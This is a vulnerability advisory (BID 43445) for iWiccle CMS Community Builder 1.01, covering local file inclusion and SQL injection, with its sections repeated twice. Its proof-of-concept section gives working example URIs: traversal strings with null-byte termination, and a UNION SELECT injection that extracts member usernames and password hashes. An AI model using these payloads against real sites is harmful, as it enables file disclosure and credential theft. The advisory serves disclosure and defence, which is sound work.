iWiccle CMS Community Builder Local File Include and SQL Injection Vulnerabilities
BID:43445
Info
iWiccle CMS Community Builder Local File Include and SQL Injection Vulnerabilities
| Bugtraq ID: | 43445 |
| Class: | Input Validation Error |
| CVE: |
CVE-2009-3216 CVE-2009-3217 |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 27 2009 12:00AM |
| Updated: | Jul 27 2009 12:00AM |
| Credit: | SirGod |
| Vulnerable: | |
| Not Vulnerable: | |
Discussion
iWiccle CMS Community Builder Local File Include and SQL Injection Vulnerabilities
iWiccle CMS Community Builder is prone to multiple local file-include vulnerabilities and a SQL-injection vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit the multiple local file-include vulnerabilities using directory-traversal strings to view and execute arbitrary local files within the context of the webserver process. Information harvested may aid in further attacks.
The attacker can exploit the SQL-injection vulnerability to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
iWiccle CMS Community Builder 1.01 is vulnerable; other versions may also be affected.
iWiccle CMS Community Builder is prone to multiple local file-include vulnerabilities and a SQL-injection vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit the multiple local file-include vulnerabilities using directory-traversal strings to view and execute arbitrary local files within the context of the webserver process. Information harvested may aid in further attacks.
The attacker can exploit the SQL-injection vulnerability to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
iWiccle CMS Community Builder 1.01 is vulnerable; other versions may also be affected.
Exploit / POC
iWiccle CMS Community Builder Local File Include and SQL Injection Vulnerabilities
Attackers can exploit these issues via a browser.
The following example URIs are available:
http://www.example.com/[path]/index.php?module=../../../../../../bootsect.bak%00
http://www.example.com/[path]/index.php?module=admin&show=../../../../../../bootsect.bak%00
http://www.example.com/[path]/index.php?module=admin&show=users&area=manage_users&action=edit_user&member_id=null+union+all+select+1,2,3,4,concat_ws
(0x3a,member_username,member_password,member_hash),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41+from+w_members+where+member_id=1--
Attackers can exploit these issues via a browser.
The following example URIs are available:
http://www.example.com/[path]/index.php?module=../../../../../../bootsect.bak%00
http://www.example.com/[path]/index.php?module=admin&show=../../../../../../bootsect.bak%00
http://www.example.com/[path]/index.php?module=admin&show=users&area=manage_users&action=edit_user&member_id=null+union+all+select+1,2,3,4,concat_ws
(0x3a,member_username,member_password,member_hash),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41+from+w_members+where+member_id=1--
Solution / Fix
iWiccle CMS Community Builder Local File Include and SQL Injection Vulnerabilities
Solution:
Updates are available. Please see the references for more details.
Solution:
Updates are available. Please see the references for more details.